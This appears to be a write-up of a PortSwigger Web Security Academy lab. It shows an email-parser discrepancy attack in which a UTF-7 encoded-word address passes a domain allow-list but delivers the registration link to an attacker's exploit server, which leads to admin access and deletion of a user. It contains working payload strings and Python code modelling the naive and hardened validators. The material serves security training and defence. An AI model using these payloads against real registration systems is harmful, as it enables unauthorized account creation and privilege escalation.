| Field | Detail |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Business Logic — Email Parser Discrepancy, Encoded-Word Bypass |
| Difficulty | Expert |
| Objective | Exploit an email address parser discrepancy to register an account and delete carlos |
| Note | Based on "Splitting the Email Atom: Exploiting Parsers to Bypass Access Controls" by Gareth Heyes (PortSwigger Research) |
Bypassing Access Controls Using Email Address Parsing Discrepancies
The registration form required a @ginandjuice.shop email address. Attempting to register with an external address returned "Only emails with the ginandjuice.shop domain are allowed."
We have an email client at @exploit-server.net and all its subdomains. The goal is to get the server to deliver a registration link to our exploit server while the domain validation sees a @ginandjuice.shop address — a parser discrepancy between the validation library and the email delivery library.
A basic double-@ injection ([email protected]@ginandjuice.shop) returned "Invalid email."
RFC-compliant emails support the "encoded-word" format (=?charset?encoding?text?=), designed for representing non-ASCII characters in email headers. Its presence in an email address is unusual enough that many validators don't account for it, while delivery libraries that decode it may do so differently. Testing Q-Encoding with common charsets:
Both returned "Registration blocked for security reasons" — the server detects Q-Encoding with common charsets.
UTF-7 uses Base64 segments introduced by & and terminated by - for non-ASCII characters — a charset that widely-deployed validation systems fail to recognize as security-relevant. Testing:
=?utf-7?q?&[email protected]
Please check your emails for your account registration link
UTF-7 slipped through. The validation parser doesn't decode it, while the email delivery library does — the same string is interpreted differently by two different components.
With the bypass confirmed, I used CyberChef (UTF-16BE → Base64) to encode the critical characters:

- `@` → `&AEA-`
- space → `&ACA-`
The payload:
=?utf-7?q?attacker&AEA-exploit-0a3e00f9036c54b682268e73014d00f6.exploit-server.net&[email protected]
The validator sees a literal string ending in @ginandjuice.shop and passes it. A UTF-7-aware email parser decodes it to:
attacker@exploit-0a3e00f9036c54b682268e73014d00f6.exploit-server.net @ginandjuice.shop
The space encoded as &ACA- separates the actual delivery address from the trailing @ginandjuice.shop in the decoded result — the email system routes to the exploit server address and treats the trailing portion as a comment or drops it entirely.
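To make the discrepancy concrete from the defending side, here is an added example (not part of the lab or the original writeup) that models both parsers: a naive validator that only looks at the literal string, a UTF-7-aware decoder that produces the routed address, and a hardened check that validates the decoded form and rejects anything decoding changes. The validator's exact logic and a delivery library that accepts `&` as the UTF-7 shift character are assumptions; the payload is constructed in the shape of the one above.

```python
import base64
import re
DOMAIN = "ginandjuice.shop"
# Constructed payload in the shape of the writeup's (host copied from the page).
PAYLOAD = ("=?utf-7?q?attacker&AEA-exploit-0a3e00f9036c54b682268e73014d00f6"
           ".exploit-server.net&ACA-@ginandjuice.shop")
ENCODED_WORD = re.compile(r"^=\?([^?]+)\?[qQ]\?(.*?)(?:\?=)?$")
STRICT = re.compile(r"[A-Za-z0-9._+-]+@" + re.escape(DOMAIN))

def decode_utf7(text: str) -> str:
    # Expand UTF-7 shift sequences ('&'/'+' base64 '-') to characters. RFC 2152
    # opens with '+'; the writeup's payload uses '&', so both are accepted here
    # on the assumption that the delivery library is equally permissive.
    out, i = [], 0
    while i < len(text):
        if text[i] not in "+&":
            out.append(text[i])
            i += 1
            continue
        j = i + 1
        while j < len(text) and (text[j].isalnum() or text[j] in "+/"):
            j += 1
        b64 = text[i + 1:j]  # modified base64 of UTF-16BE; '&-' means a literal '&'
        out.append(base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-be") if b64 else text[i])
        i = j + 1 if j < len(text) and text[j] == "-" else j
    return "".join(out)

def canonicalize(addr: str) -> str:
    # What a delivery library that honours =?utf-7?q?...?= in an address sees.
    m = ENCODED_WORD.match(addr)
    if not m:
        return addr
    charset, text = m.group(1).lower(), m.group(2).replace("_", " ")
    text = re.sub(r"=([0-9A-Fa-f]{2})", lambda h: chr(int(h.group(1), 16)), text)
    return decode_utf7(text) if charset == "utf-7" else text

def naive_validate(addr: str) -> bool:
    # Models the lab's validator (assumption): one literal '@', exact domain, no decoding.
    _, sep, domain = addr.partition("@")
    return sep == "@" and domain == DOMAIN

def delivery_domain(addr: str) -> str:
    # Domain the decoded address is routed to: first token wins, the rest is dropped.
    return canonicalize(addr).split()[0].rpartition("@")[2]

def hardened_validate(addr: str) -> bool:
    # Validate the form that will be delivered: refuse anything decoding changes, then allow-list.
    return canonicalize(addr) == addr and STRICT.fullmatch(addr) is not None
```

Running `naive_validate(PAYLOAD)` returns True while `delivery_domain(PAYLOAD)` is the exploit-server host, which is the whole discrepancy in two calls; `hardened_validate` rejects the payload and also a no-op encoded word such as `=?utf-7?q?wiener@ginandjuice.shop`.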
Registering with the payload:
Registration email arrived at the exploit server:
Logged in as miku:
The admin panel was accessible. Going to /admin and clicking delete on carlos:
Lab solved and section finished